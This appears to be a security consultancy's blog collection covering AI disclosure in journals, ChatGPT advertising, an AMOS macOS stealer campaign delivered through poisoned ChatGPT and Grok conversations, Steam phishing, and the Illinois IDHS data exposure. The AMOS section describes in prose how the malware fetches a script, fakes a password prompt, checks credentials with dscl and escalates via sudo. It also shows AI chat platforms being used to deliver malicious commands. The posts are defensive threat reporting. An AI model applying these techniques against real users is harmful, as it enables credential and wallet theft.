Jacobian Engineering

The rapid integration of AI tools into scientific research is creating new challenges for transparency and institutional integrity. Recent studies examining manuscripts submitted to JAMA Network journals found AI usage increased from 1.71% to 5.97% over just 27 months, with most authors leveraging these tools to improve writing quality. Similarly, BMJ journals reported 5.7% of submissions disclosed AI utilization.

These figures likely underrepresent actual usage. Self-disclosure depends on clear institutional guidelines, consistent enforcement, and researcher awareness of when AI assistance crosses from acceptable editing to substantive contribution requiring acknowledgment.

The implications extend beyond academic publishing. Healthcare organizations, SaaS companies, and research institutions face similar challenges across their operations: employees using AI tools for documentation, analysis, and decision support without clear governance frameworks defining acceptable use, disclosure requirements, and quality verification processes.

Three organizational priorities emerge from this data:

Establish Clear AI Use Policies: Define what constitutes acceptable AI assistance versus substantive AI contribution across different work contexts. Vague guidance leads to inconsistent practices and compliance gaps.

Implement Disclosure Mechanisms: Create standardized processes for documenting AI tool usage in work products, whether research manuscripts, clinical documentation, or software development artifacts.

Build Verification Workflows: AI-assisted outputs require human review processes calibrated to the risk level of the content. Medical research, clinical decisions, and security configurations demand rigorous verification; internal documentation may require less scrutiny.

At Jacobian Engineering, we help healthcare organizations and research institutions develop comprehensive AI governance frameworks that address these challenges. Our policy development services establish clear boundaries for AI tool usage while our compliance programs create the documentation and monitoring infrastructure needed to maintain transparency and meet regulatory expectations.

The 5-6% disclosure rates in medical journals represent early indicators of a broader transformation. Organizations that establish governance frameworks now will be better positioned to capture AI productivity benefits while maintaining the integrity standards their stakeholders expect.

OpenAI is reportedly developing advertising capabilities for ChatGPT that would prioritize sponsored content directly within AI-generated responses. Ad mockups include displaying sponsored information in a sidebar alongside the main response window, with AI models potentially configured to ensure sponsored content appears in answers.

An OpenAI spokesperson confirmed the company is exploring ads, stating they're examining "what ads in our product could look like" while claiming any approach would "respect" the trusted relationship users have with ChatGPT.

The core concern here is not just advertising. It's the underlying data infrastructure that makes personalized advertising possible. ChatGPT likely knows more about users than traditional search engines. The conversational nature of AI interactions means users often share detailed context about their work, decisions, challenges, and intentions that they would never enter into a search query.

For organizations in regulated industries — healthcare, financial services, legal — this raises immediate questions about data handling, consent, and third-party risk. When employees use ChatGPT for business tasks, what information is being collected? How might that data support advertising models? What disclosures are required when AI recommendations may be influenced by commercial relationships?

The shift from utility tool to advertising platform fundamentally changes the risk profile of any AI service. Organizations that have incorporated ChatGPT into workflows need to reassess their vendor risk evaluations and data processing agreements.

Jacobian Engineering's privacy compliance services, spanning GDPR, CCPA, and sector-specific regulations, include third-party vendor assessments that evaluate how AI platforms handle sensitive business data. We help clients develop governance frameworks that address AI tool usage, data classification requirements, and appropriate use policies before regulatory guidance catches up to technological change.

Organizations should review their AI acceptable use policies now, before advertising features roll out. The time to establish data governance controls around AI tools is before the platform economics shift, not after.

Attackers have discovered a new social engineering attack vector that bypasses traditional security controls entirely: weaponizing AI platform trust.

Huntress researchers disclosed a campaign on December 5, 2025 where the Atomic macOS Stealer (AMOS) is being delivered through poisoned search results that surface fake ChatGPT and Grok conversations. The attack is devastatingly simple. A user searches for something routine, "clear disk space on macOS," and Google surfaces what appear to be legitimate AI troubleshooting conversations hosted on chatgpt.com and grok.com.

These are not impersonation sites. They are real conversations on legitimate platforms, created by attackers and SEO-poisoned to rank highly. The conversations use professional formatting, reassuring language, and code blocks with Terminal commands presented as safe system cleanup instructions. When users copy and paste these commands, they execute a multi-stage infection chain that harvests passwords, escalates to root privileges, and deploys persistent malware.

The technical ex*****on is sophisticated. The Terminal command decodes a base64-encoded URL that fetches a malicious bash script. This script presents a fake password prompt, silently validates credentials using macOS Directory Services (dscl -authonly), and then uses those credentials for privilege escalation via sudo. AMOS establishes persistence through LaunchDaemon mechanisms and includes trojanized versions of cryptocurrency wallet applications like Ledger and Trezor that harvest seed phrases.

What makes this campaign significant is how it exploits layered trust. Users trust search engines to surface vetted results. They trust chatgpt.com and grok.com as legitimate domains. They trust the familiar formatting of AI conversations. This attack does not break any of these trust layers. It weaponizes all of them simultaneously.

For organizations, this represents a fundamental shift in threat awareness. Traditional security training focuses on suspicious emails, unknown downloads, and warning dialogs. This campaign succeeds because the behavior appears completely normal.

Jacobian Engineering's security awareness training programs help organizations address this evolution. Our training emphasizes critical evaluation of all external instructions, including AI-generated content, and builds the skeptical mindset needed when any source requests Terminal access or administrative credentials.

The takeaway: platform trust is not content trust. AI assistants hosted on legitimate domains can still serve malicious instructions. Defenders need updated training programs, behavioral monitoring for anomalous Terminal and sudo usage, and clear policies about executing commands from external sources.

Malware no longer needs to impersonate legitimate software. It just needs to impersonate help.

A circulating phishing campaign targeting Steam users demonstrates why the presence of HTTPS alone should never be trusted as a security indicator.

The attack uses a fraudulent login page that looks virtually identical to Steam's legitimate site, complete with a valid SSL certificate and the familiar padlock icon. For years, users have been taught that HTTPS equals safety. Attackers know this, and they've adapted.

Obtaining SSL certificates is trivial. Free certificate authorities issue them in minutes with minimal verification. The padlock confirms that your connection to a server is encrypted. It says nothing about whether that server is legitimate. A phishing site with HTTPS simply means your stolen credentials are transmitted securely to the attacker.

What to verify instead: Check the actual URL character by character — attackers use lookalike domains (stearn.com, steam-login.com, steampowered.net). Consider how you arrived at the page; if you clicked a link from Discord, email, or social media, navigate directly to known URLs instead. Be suspicious of unexpected authentication prompts, especially those offering free items, urgent account warnings, or trade requests. And if your password manager doesn't autofill credentials, pause — it won't recognize a fake domain.

Gaming platforms are high-value targets. Steam accounts often contain significant game libraries, tradeable items worth real money, and linked payment methods. A compromised account can lead to financial theft, social engineering of your contacts, and permanent loss of digital assets.

At Jacobian Engineering, we help organizations build resilience against these attacks through security awareness training programs that teach employees to recognize sophisticated phishing attempts. Our social engineering campaigns test your team's defenses with realistic simulations, including credential harvesting sites, to identify vulnerabilities before attackers do.

The padlock icon was never meant to indicate trust. It indicates encryption. Understanding that distinction is the first step toward better security hygiene.

The Illinois Department of Human Services (IDHS) has disclosed a significant security incident: an internal mapping website containing residents' personal information was publicly accessible from April 2021 through September 2025...more than four years!

The exposure affected over 700,000 individuals. Specifically, 672,616 Medicaid and Medicare Savings Program recipients had their addresses, case numbers, and demographic data exposed. An additional 32,401 individuals receiving Division of Rehabilitation Services had names, addresses, and case statuses publicly viewable. The website was intended for internal use to assist with resource allocation.

Perhaps most concerning: IDHS has stated it cannot determine whether anyone actually accessed the exposed data during this extended window. This uncertainty compounds the incident's severity and underscores a fundamental gap in security monitoring and logging capabilities.

This incident illustrates several systemic issues common in public sector healthcare organizations:

Configuration management failures caused internal tools to be exposed to the public internet without proper access controls, representing a basic security hygiene breakdown. These misconfigurations often persist because they don't trigger alerts unless proper monitoring exists.

Extended detection timelines led to four years of exposure before discovery, suggesting insufficient vulnerability scanning, pe*******on testing, and security assessments. Regular external security evaluations would likely have identified a publicly accessible internal application.

Logging and monitoring gaps resulted in the inability to determine data access, indicating inadequate audit logging—a direct HIPAA Security Rule requirement under the Audit Controls standard (§164.312(b)).

For healthcare organizations handling protected health information, this serves as a critical reminder that compliance is not a checkbox exercise. HIPAA's Security Rule explicitly requires regular risk assessments, technical safeguards, and audit controls—precisely the areas where this incident reveals deficiencies.

Jacobian Engineering's managed compliance services, including those that specialize in HIPAA protection, help healthcare organizations identify these gaps before they become multi-year exposures. Our comprehensive risk assessments evaluate technical safeguards, access controls, and monitoring capabilities against Security Rule requirements, while our HITRUST validated assessments ensure organizations can demonstrate compliance when it matters most.

The four-year exposure window in Illinois represents the difference between proactive security management and reactive incident response. Organizations that conduct regular security assessments and maintain continuous compliance monitoring significantly reduce both their risk profile and potential regulatory exposure.